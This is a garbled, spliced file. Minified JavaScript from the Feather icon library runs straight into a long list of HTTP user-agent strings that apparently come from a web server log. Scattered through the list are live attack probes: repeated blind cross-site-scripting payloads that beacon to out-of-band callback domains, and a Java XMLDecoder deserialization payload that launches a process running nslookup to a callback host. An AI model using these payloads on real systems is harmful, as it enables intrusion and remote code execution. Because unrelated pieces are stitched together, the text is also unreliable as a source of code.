in","arrow","enter"],"log-out":["sign out","arrow","exit"],mail:["email","message"],"map-pin":["location","navigation","travel","marker"],map:["location","navigation","travel"],maximize:["fullscreen"],"maximize-2":["fullscreen","arrows","expand"],meh:["emoji","face","neutral","emotion"],menu:["bars","navigation","hamburger"],"message-circle":["comment","chat"],"message-square":["comment","chat"],"mic-off":["record","sound","mute"],mic:["record","sound","listen"],minimize:["exit fullscreen","close"],"minimize-2":["exit fullscreen","arrows","close"],minus:["subtract"],monitor:["tv","screen","display"],moon:["dark","night"],"more-horizontal":["ellipsis"],"more-vertical":["ellipsis"],"mouse-pointer":["arrow","cursor"],move:["arrows"],music:["note"],navigation:["location","travel"],"navigation-2":["location","travel"],octagon:["stop"],package:["box","container"],paperclip:["attachment"],pause:["music","stop"],"pause-circle":["music","audio","stop"],"pen-tool":["vector","drawing"],percent:["discount"],"phone-call":["ring"],"phone-forwarded":["call"],"phone-incoming":["call"],"phone-missed":["call"],"phone-off":["call","mute"],"phone-outgoing":["call"],phone:["call"],play:["music","start"],"pie-chart":["statistics","diagram"],"play-circle":["music","start"],plus:["add","new"],"plus-circle":["add","new"],"plus-square":["add","new"],pocket:["logo","save"],power:["on","off"],printer:["fax","office","device"],radio:["signal"],"refresh-cw":["synchronise","arrows"],"refresh-ccw":["arrows"],repeat:["loop","arrows"],rewind:["music"],"rotate-ccw":["arrow"],"rotate-cw":["arrow"],rss:["feed","subscribe"],save:["floppy disk"],scissors:["cut"],search:["find","magnifier","magnifying glass"],send:["message","mail","email","paper airplane","paper aeroplane"],settings:["cog","edit","gear","preferences"],"share-2":["network","connections"],shield:["security","secure"],"shield-off":["security","insecure"],"shopping-bag":["ecommerce","cart","purchase","store"],"shopping-cart":["ecommerce","cart","purchase","store"],shuffle:["music"],"skip-back":["music"],"skip-forward":["music"],slack:["logo"],slash:["ban","no"],sliders:["settings","controls"],smartphone:["cellphone","device"],smile:["emoji","face","happy","good","emotion"],speaker:["audio","music"],star:["bookmark","favorite","like"],"stop-circle":["media","music"],sun:["brightness","weather","light"],sunrise:["weather","time","morning","day"],sunset:["weather","time","evening","night"],tablet:["device"],tag:["label"],target:["logo","bullseye"],terminal:["code","command line","prompt"],thermometer:["temperature","celsius","fahrenheit","weather"],"thumbs-down":["dislike","bad","emotion"],"thumbs-up":["like","good","emotion"],"toggle-left":["on","off","switch"],"toggle-right":["on","off","switch"],tool:["settings","spanner"],trash:["garbage","delete","remove","bin"],"trash-2":["garbage","delete","remove","bin"],triangle:["delta"],truck:["delivery","van","shipping","transport","lorry"],tv:["television","stream"],twitch:["logo"],twitter:["logo","social"],type:["text"],umbrella:["rain","weather"],unlock:["security"],"user-check":["followed","subscribed"],"user-minus":["delete","remove","unfollow","unsubscribe"],"user-plus":["new","add","create","follow","subscribe"],"user-x":["delete","remove","unfollow","unsubscribe","unavailable"],user:["person","account"],users:["group"],"video-off":["camera","movie","film"],video:["camera","movie","film"],voicemail:["phone"],volume:["music","sound","mute"],"volume-1":["music","sound"],"volume-2":["music","sound"],"volume-x":["music","sound","mute"],watch:["clock","time"],"wifi-off":["disabled"],wifi:["connection","signal","wireless"],wind:["weather","air"],"x-circle":["cancel","close","delete","remove","times","clear"],"x-octagon":["delete","stop","alert","warning","times","clear"],"x-square":["cancel","close","delete","remove","times","clear"],x:["cancel","close","delete","remove","times","clear"],youtube:["logo","video","play"],"zap-off":["flash","camera","lightning"],zap:["flash","camera","lightning"],"zoom-in":["magnifying glass"],"zoom-out":["magnifying glass"]}},function(e){e.exports={activity:'',airplay:'',"alert-circle":'',"alert-octagon":'',"alert-triangle":'',"align-center":'',"align-justify":'',"align-left":'',"align-right":'',anchor:'',aperture:'',archive:'',"arrow-down-circle":'',"arrow-down-left":'',"arrow-down-right":'',"arrow-down":'',"arrow-left-circle":'',"arrow-left":'',"arrow-right-circle":'',"arrow-right":'',"arrow-up-circle":'',"arrow-up-left":'',"arrow-up-right":'',"arrow-up":'',"at-sign":'',award:'',"bar-chart-2":'',"bar-chart":'',"battery-charging":'',battery:'',"bell-off":'',bell:'',bluetooth:'',bold:'',"book-open":'',book:'',bookmark:'',box:'',briefcase:'',calendar:'',"camera-off":'',camera:'',cast:'',"check-circle":'',"check-square":'',check:'',"chevron-down":'',"chevron-left":'',"chevron-right":'',"chevron-up":'',"chevrons-down":'',"chevrons-left":'',"chevrons-right":'',"chevrons-up":'',chrome:'',circle:'',clipboard:'',clock:'',"cloud-drizzle":'',"cloud-lightning":'',"cloud-off":'',"cloud-rain":'',"cloud-snow":'',cloud:'',code:'',codepen:'',codesandbox:'',coffee:'',columns:'',command:'',compass:'',copy:'',"corner-down-left":'',"corner-down-right":'',"corner-left-down":'',"corner-left-up":'',"corner-right-down":'',"corner-right-up":'',"corner-up-left":'',"corner-up-right":'',cpu:'',"credit-card":'',crop:'',crosshair:'',database:'',delete:'',disc:'',"divide-circle":'',"divide-square":'',divide:'',"dollar-sign":'',"download-cloud":'',download:'',dribbble:'',droplet:'',"edit-2":'',"edit-3":'',edit:'',"external-link":'',"eye-off":'',eye:'',facebook:'',"fast-forward":'',feather:'',figma:'',"file-minus":'',"file-plus":'',"file-text":'',file:'',film:'',filter:'',flag:'',"folder-minus":'',"folder-plus":'',folder:'',framer:'',frown:'',gift:'',"git-branch":'',"git-commit":'',"git-merge":'',"git-pull-request":'',github:'',gitlab:'',globe:'',grid:'',"hard-drive":'',hash:'',headphones:'',heart:'',"help-circle":'',hexagon:'',home:'',image:'',inbox:'',info:'',instagram:'',italic:'',key:'',layers:'',layout:'',"life-buoy":'',"link-2":'',link:'',linkedin:'',list:'',loader:'',lock:'',"log-in":'',"log-out":'',mail:'',"map-pin":'',map:'',"maximize-2":'',maximize:'',meh:'',menu:'',"message-circle":'',"message-square":'',"mic-off":'',mic:'',"minimize-2":'',minimize:'',"minus-circle":'',"minus-square":'',minus:'',monitor:'',moon:'',"more-horizontal":'',"more-vertical":'',"mouse-pointer":'',move:'',music:'',"navigation-2":'',navigation:'',octagon:'',package:'',paperclip:'',"pause-circle":'',pause:'',"pen-tool":'',percent:'',"phone-call":'',"phone-forwarded":'',"phone-incoming":'',"phone-missed":'',"phone-off":'',"phone-outgoing":'',phone:'',"pie-chart":'',"play-circle":'',play:'',"plus-circle":'',"plus-square":'',plus:'',pocket:'',power:'',printer:'',radio:'',"refresh-ccw":'',"refresh-cw":'',repeat:'',rewind:'',"rotate-ccw":'',"rotate-cw":'',rss:'',save:'',scissors:'',search:'',send:'',server:'',settings:'',"share-2":'',share:'',"shield-off":'',shield:'',"shopping-bag":'',"shopping-cart":'',shuffle:'',sidebar:'',"skip-back":'',"skip-forward":'',slack:'',slash:'',sliders:'',smartphone:'',smile:'',speaker:'',square:'',star:'',"stop-circle":'',sun:'',sunrise:'',sunset:'',table:'',tablet:'',tag:'',target:'',terminal:'',thermometer:'',"thumbs-down":'',"thumbs-up":'',"toggle-left":'',"toggle-right":'',tool:'',"trash-2":'',trash:'',trello:'',"trending-down":'',"trending-up":'',triangle:'',truck:'',tv:'',twitch:'',twitter:'',type:'',umbrella:'',underline:'',unlock:'',"upload-cloud":'',upload:'',"user-check":'',"user-minus":'',"user-plus":'',"user-x":'',user:'',users:'',"video-off":'',video:'',voicemail:'',"volume-1":'',"volume-2":'',"volume-x":'',volume:'',watch:'',"wifi-off":'',wifi:'',wind:'',"x-circle":'',"x-octagon":'',"x-square":'',x:'',youtube:'',"zap-off":'',zap:'',"zoom-in":'',"zoom-out":''}},function(e){e.exports={xmlns:"http://www.w3.org/2000/svg",width:24,height:24,viewBox:"0 0 24 24",fill:"none",stroke:"currentColor","stroke-width":2,"stroke-linecap":"round","stroke-linejoin":"round"}},function(e,n,i){"use strict";Object.defineProperty(n,"__esModule",{value:!0});var t=Object.assign||function(e){for(var n=1;n2&&void 0!==arguments[2]?arguments[2]:[];!function(e,n){if(!(e instanceof n))throw new TypeError("Cannot call a class as a function")}(this,e),this.name=n,this.contents=i,this.tags=l,this.attrs=t({},o.default,{class:"feather feather-"+n})}return l(e,[{key:"toSvg",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};return""+this.contents+""}},{key:"toString",value:function(){return this.contents}}]),e}();n.default=c},function(e,n,i){"use strict";var t=o(i(12)),l=o(i(39)),r=o(i(38));function o(e){return e&&e.__esModule?e:{default:e}}e.exports={icons:t.default,toSvg:l.default,replace:r.default}},function(e,n,i){e.exports=i(0)},function(e,n,i){var t=i(2)("iterator"),l=!1;try{var r=0,o={next:function(){return{done:!!r++}},return:function(){l=!0}};o[t]=function(){return this},Array.from(o,function(){throw 2})}catch(e){}e.exports=function(e,n){if(!n&&!l)return!1;var i=!1;try{var r={};r[t]=function(){return{next:function(){return{done:i=!0}}}},e(r)}catch(e){}return i}},function(e,n,i){var t=i(30),l=i(2)("toStringTag"),r="Arguments"==t(function(){return arguments}());e.exports=function(e){var n,i,o;return void 0===e?"Undefined":null===e?"Null":"string"==typeof(i=function(e,n){try{return e[n]}catch(e){}}(n=Object(e),l))?i:r?t(n):"Object"==(o=t(n))&&"function"==typeof n.callee?"Arguments":o}},function(e,n,i){var t=i(47),l=i(9),r=i(2)("iterator");e.exports=function(e){if(void 0!=e)return e[r]||e["@@iterator"]||l[t(e)]}},function(e,n,i){"use strict";var t=i(18),l=i(7),r=i(10);e.exports=function(e,n,i){var o=t(n);o in e?l.f(e,o,r(0,i)):e[o]=i}},function(e,n,i){var t=i(2),l=i(9),r=t("iterator"),o=Array.prototype;e.exports=function(e){return void 0!==e&&(l.Array===e||o[r]===e)}},function(e,n,i){var t=i(3);e.exports=function(e,n,i,l){try{return l?n(t(i)[0],i[1]):n(i)}catch(n){var r=e.return;throw void 0!==r&&t(r.call(e)),n}}},function(e,n){e.exports=function(e){if("function"!=typeof e)throw TypeError(String(e)+" is not a function");return e}},function(e,n,i){var t=i(52);e.exports=function(e,n,i){if(t(e),void 0===n)return e;switch(i){case 0:return function(){return e.call(n)};case 1:return function(i){return e.call(n,i)};case 2:return function(i,t){return e.call(n,i,t)};case 3:return function(i,t,l){return e.call(n,i,t,l)}}return function(){return e.apply(n,arguments)}}},function(e,n,i){"use strict";var t=i(53),l=i(24),r=i(51),o=i(50),a=i(27),c=i(49),p=i(48);e.exports=function(e){var n,i,y,h,x=l(e),s="function"==typeof this?this:Array,u=arguments.length,d=u>1?arguments[1]:void 0,f=void 0!==d,g=0,v=p(x);if(f&&(d=t(d,u>2?arguments[2]:void 0,2)),void 0==v||s==Array&&o(v))for(i=new s(n=a(x.length));n>g;g++)c(i,g,f?d(x[g],g):x[g]);else for(h=v.call(x),i=new s;!(y=h.next()).done;g++)c(i,g,f?r(h,d,[y.value,g],!0):y.value);return i.length=g,i}},function(e,n,i){var t=i(32),l=i(54);t({target:"Array",stat:!0,forced:!i(46)(function(e){Array.from(e)})},{from:l})},function(e,n,i){var t=i(6),l=i(3);e.exports=function(e,n){if(l(e),!t(n)&&null!==n)throw TypeError("Can't set "+String(n)+" as a prototype")}},function(e,n,i){var t=i(56);e.exports=Object.setPrototypeOf||("__proto__"in{}?function(){var e,n=!1,i={};try{(e=Object.getOwnPropertyDescriptor(Object.prototype,"__proto__").set).call(i,[]),n=i instanceof Array}catch(e){}return function(i,l){return t(i,l),n?e.call(i,l):i.__proto__=l,i}}():void 0)},function(e,n,i){var t=i(0).document;e.exports=t&&t.documentElement},function(e,n,i){var t=i(28),l=i(13);e.exports=Object.keys||function(e){return t(e,l)}},function(e,n,i){var t=i(8),l=i(7),r=i(3),o=i(59);e.exports=t?Object.defineProperties:function(e,n){r(e);for(var i,t=o(n),a=t.length,c=0;a>c;)l.f(e,i=t[c++],n[i]);return e}},function(e,n,i){var t=i(3),l=i(60),r=i(13),o=i(15),a=i(58),c=i(34),p=i(16)("IE_PROTO"),y=function(){},h=function(){var e,n=c("iframe"),i=r.length;for(n.style.display="none",a.appendChild(n),n.src=String("javascript:"),(e=n.contentWindow.document).open(),e.write(" +python-requests/2.7.0 CPython/2.7.9 Windows/2003Server +Apache-HttpClient/4.5.1 (Java/1.8.0_92) +okhttp/3.9.1 + +Screaming Frog SEO Spider/9.4 +YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/) +PEAR HTTP_Request class ( http://pear.php.net/ ) +FDM/5.1.34.6885 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7) +FDM/5.1.37.7258 +HubSpot Links Crawler 2.0 http://www.hubspot.com/ +curl/7.60.0 +python-requests/2.19.0 +WhatsApp/0.2.9737 N +Python/3.6 aiohttp/2.3.2 +Mozilla/5.0 (compatible; Crawler/0.9; http://linkfluence.net/) +Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) +weborama-fetcher (+http://www.weborama.com) +WhatWeb/0.4.9 +RSSOwl/1.2.3 2006-11-26 (Windows; U; zhtw) +Microsoft Data Access Internet Publishing Provider DAV +Mozilla/4.0 (compatible; ibisBrowser) +WhatsApp/2.18.191 A +Google-Sitemaps/1.0 +Mozilla/4.7 (compatible; OffByOne; Windows 2000) +Sprinklr 2.0 +python-requests/2.19.1 +Mozilla/5.0 (GetLinkInfo.com - http://www.getlinkinfo.com) +Hatena::Scissors/0.01 +WhatsApp/0.2.9230 N +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko; Google Web Preview) Chrome/12.0.742 Safari/535.1 +Python/3.6 aiohttp/3.1.3 +newspaper/0.1.0.7 +AmigaVoyager/3.4.4 (MorphOS/PPC native) +WhatsApp/0.2.9928 N +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/[WEBKIT_VERSION] (KHTML, like Gecko; Mediapartners-Google) Chrome/[CHROME_VERSION] Mobile Safari/[WEBKIT_VERSION] +WhatsApp/2.18.70 i +Python/3.6 aiohttp/3.3.2 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180704.180746 +AppEngine-Google; (+http://code.google.com/appengine; appid: s~google.com:web-health-dashboard) +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 AppEngine-Google; (+http://code.google.com/appengine; appid: s~showsitedotus) +python-requests/2.2.1 CPython/3.4.3 Linux/3.13.0-30-generic +FeedValidator/1.3 +InetURL:/1.0 +WhatsApp/2.18.203 A +Mozilla/5.0 (compatible; PaperLiBot/2.1; https://support.paper.li/entries/20023257-what-is-paper-li) +Mozilla/5.0 AppEngine-Google; (+http://code.google.com/appengine; appid: e~finscience-1253) +Mozilla/5.0 (X11; compatible; semantic-visions.com crawler; HTTPClient 3.1) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.11067 BingPreview/1.0b +Apache-HttpClient/4.5.4 (Java/1.8.0_162) +AHC/2.1 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; (R1 1.5)) +Apache-HttpClient/4.5.2 (Java/1.7.0_55) +WhatsApp/2.18.218 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 PTST/180716.160703 +Apache-HttpClient/4.5.2 (Java/1.8.0_181) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180716.160703 +DAP 10 +libwww-perl/6.35 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 PTST/180720.130718 +Apache-HttpClient/4.5.5 (Java/1.8.0_162) +Mozilla/5.0 (compatible; Qwantify/Mermoz/0.1; +https://www.qwant.com/; +https://www.github.com/QwantResearch/mermoz) +DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180720.130718 +Mozilla/5.0 (compatible; X-CAD-SE/1.75; +http://info.cadse.easterngraphics.com/wa_contact/) Java/1.8.0_60 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; 360Spider(compatible; HaosouSpider; http://www.haosoucom/help/help_3_2.html) +WhatsApp/2.18.80 i +WhatsApp/2.18.224 A +Mozilla/5.0 (compatible; Snacktory; +https://flynxapp.com) +WhatsApp/0.2.9739 N +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 (FlipboardProxy/1.1; +http://flipboard.com/browserproxy) +WhatsApp/2.18.217 A +Friendica +W3C_Unicorn/1.0 (http://validator.w3.org/services) +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 AppEngine-Google; (+http://code.google.com/appengine; appid: s~showdomaindotorg) +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 AppEngine-Google; (+http://code.google.com/appengine; appid: e~arsnova-filter-system) +Java/1.8.0_181 +Faraday v0.15.2 +WhatsApp/0.3.225 N +Microsoft-WebDAV-MiniRedir/10.0.17134 +curl/7.3.2 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 PTST/249 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180801.140822 +Mozilla/5.0 (compatible; YandexBlogs/0.99; robot; B; +http://yandex.com/bots) 1 readers +Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko (compatible; Zombiebot/2.1; +http://www.zombiedomain.net/robot/) +WhatsApp/2.18.230 A +WhatsApp/2.18.238 A +python-requests/2.7.0 CPython/2.7.3 Linux/2.6.18-308.el5 +Scrapy/1.5.1 (+https://scrapy.org) +CCBot/2.0 (https://commoncrawl.org/faq/) +Yandex/1.01.001 (compatible; Win16; I) +Mozilla/5.0 (compatible; BegunAdvertising/3.0; +http://begun.ru/begun/technology/indexer/) +WhatsApp/2.18.81 i +Apache-HttpClient/4.5.3 (Java/1.8.0_171) +Transmission/2.77 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 PTST/180813.150843 +Microsoft-WebDAV-MiniRedir/6.2.9200 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180813.150843 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 PTST/180818.200830 +Mozilla/5.0 (compatible; Google-Structured-Data-Testing-Tool +http://developers.google.com/structured-data/testing-tool/) +Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com) +bot/1.0 http://spuhex.com +Mozilla/5.0 (compatible; Seekport Crawler; http://seekport.com/) +BUbiNG - Research at Brno University of Technology - KNOT group - http://knot.fit.vutbr.cz/crawling/ - Stop? http://law.di.unimi.it/BUbiNG.html +Curl/PHP 5.6.36-0+deb8u1 (http://github.com/shuber/curl) +facebook +GuzzleHttp/6.3.3 PHP/7.0.30-0+deb9u1 +okhttp/2.2.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 Chrome-Lighthouse +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MRA58N) AppleWebKit/537.36(KHTML, like Gecko) Chrome/69.0.3464.0 Mobile Safari/537.36 Chrome-Lighthouse +Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X; %lang2%) adbeat.com/policy AppleWebKit/534.46 (KHTML, like Gecko) Version/10.0 Mobile/9A334 Safari/7534.48.3 +Mozilla/5.0 (compatible; tracemyfile/1.0) +Wappalyzer +NetSurf/2.9 (Linux; armv7l) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) NetNewsWire/3.0 +Scrapy/1.1.3 (+http://scrapy.org) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 PTST/180829.190838 +WhatsApp/2.18.260 A +unirest-java/1.3.11 +WhatsApp/0.3.557 N +python-requests/2.7.0 CPython/2.7.14 Windows/2008ServerR2 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180829.190838 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 PTST/17.12 +Mozilla/5.0 (compatible; alexa site audit/1.0; +http://www.alexa.com/help/webmasters; ) +Mozilla/4.0 (compatible; Virtuoso) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180904.190957 +curl/7.61.0 +WhatsApp/2.18.90 i +WhatsApp/2.18.276 A +Jigsaw/2.2.0 W3C_CSS_Validator_JFouffa/2.0 +lua-resty-http/0.10 (Lua) ngx_lua/10000 +Python/3.7 aiohttp/3.4.4 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 (compatible; SMTBot/1.0; http://www.similartech.com/smtbot) +Python-urllib/3.7 +python-requests/2.2.1 CPython/3.4.3 Linux/3.13.0-135-generic +WhatsApp/2.18.50 A +Apache-HttpClient/4.5.2 (Java/1.8.0_121) +Mozilla/5.0 (compatible; Snacktory; +https://github.com/karussell/snacktory) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1.1; Andromax_A16C3H ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528122062-0 +WhatsApp/2.18.152 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/gtd9copwg35m6xsoygbfirnb72d0do5ftag04p\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/0.2.6430 N +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524822098-0 +WhatsApp/2.17.393 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/nsjsd4sqwldz3ehrvfypcqsxyo4p1dt4hz4pse\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.7.10; http://www.vidaeuropeia.com/home +Scrapy/1.3.1 ( http://scrapy.org) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 PTST/180801.140822 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-crawl-production-crawler-19@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ridk1ze75euxv8hznr0q72cmwd2f43wukp7fv4\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/cm255kis9zyiztlkrc4bbng70y6vwjoac5zvnk\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10 AppEngine-Google; ( http://code.google.com/appengine; appid: d~nakula-173712) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/pkdu56kson51vg9tnhqr4skzqqwtyhq8e31tpi\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.6; https://projectlisboa.com +WhatsApp/2.18.118 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528908538-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531593513-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vvu0gcvyztg76mkzyn1xfyv51w7w2kubi65wtl\.b.inty.io/).replace(/\\/g,[]))//'> +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 7.0; Redmi_Note_4 ) U2/1.0.0 Mobile +WordPress/4.5.13; http://maxk.biz +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/wbb1wdbzfuw8mn00eohyvzb6hxnpsdk48zvpje\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.7; http://hodor.e-konomista.pt +Y!J-ASR/1.0 crawler (http://www.yahoo-help.jp/app/answers/detail/p/595/a_id/42716/) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/s6zxr96vaqr4hjvw9kcuqv62ctirkfc601nrbg\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171108.181143 +python-requests/2.5.2 CPython/2.7.14 Linux/3.13.0-36-generic +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Proxy; Android 6.0; Lava_A51 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523658041-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/y98rs65ewll4mf86eyrxy93tnktpodg44zrpfe\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/87d1qg3ouvjekp6gc8p7wj13luryomgd48ryfn\.b.inty.io/).replace(/\\/g,[]))//'> +<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_40" class="java.beans.XMLDecoder"><new class="java.lang.ProcessBuilder"><string>nslookup</string><string>ipb9soffcrqmwjfziq3yb22q7hd8i8awz.b.inty.io</string><method name="start" /></new></java> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-77@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/4z49klz732kgavo82w56j7ze55b6du5ltgg64v\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 PTST/180531.190558 +W3C-checklink/4.81 libwww-perl/6.15 +WhatsApp/2.18.10 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vgfoz3cb3is1tcf3lvyu56aquh0gw4ovcqzgn5\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/4ej9zle7i2zgpv38hwk6y7eek5q1qpig6bt1hq\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530706187-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/oc4tx5crgmx0nf1sfgiqwrcyipoppdh45zspge\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/gey9xoaw13qmrxdojgwf3r8bs2y7xvpmdh07ow\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/y433pf418wpafpt27qa0o148azgvcj4as5fv3k\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533024253-0 +binlar_2.6.5 